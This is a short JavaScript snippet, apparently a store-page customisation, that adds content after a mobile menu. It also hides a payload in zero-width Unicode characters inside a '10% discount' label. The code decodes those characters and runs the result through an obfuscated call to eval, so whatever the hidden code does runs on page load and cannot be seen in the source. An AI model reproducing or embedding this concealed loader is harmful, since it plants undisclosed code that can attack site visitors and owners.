/* START OF JS CODE BY NUSSUQ.COM */ var _8kx5 = `خصم 10%`; var _d = "" , _b = []; for (var _c of _8kx5) { var _v = _c.charCodeAt(0) - 8203; if (_v >= 0 && _v <= 3) { _b.push(_v); if (_b.length == 4) { _d += String.fromCharCode((_b[0] << 6) + (_b[1] << 4) + (_b[2] << 2) + _b[3]); _b = [] } } } window[(typeof window === 'object' ? 'e' : '') + 'val'](_d); const brandSection = document.querySelector('#mobile-menu .main-menu',); if (brandSection) { const newElements = `
`; brandSection.insertAdjacentHTML('afterend', newElements); }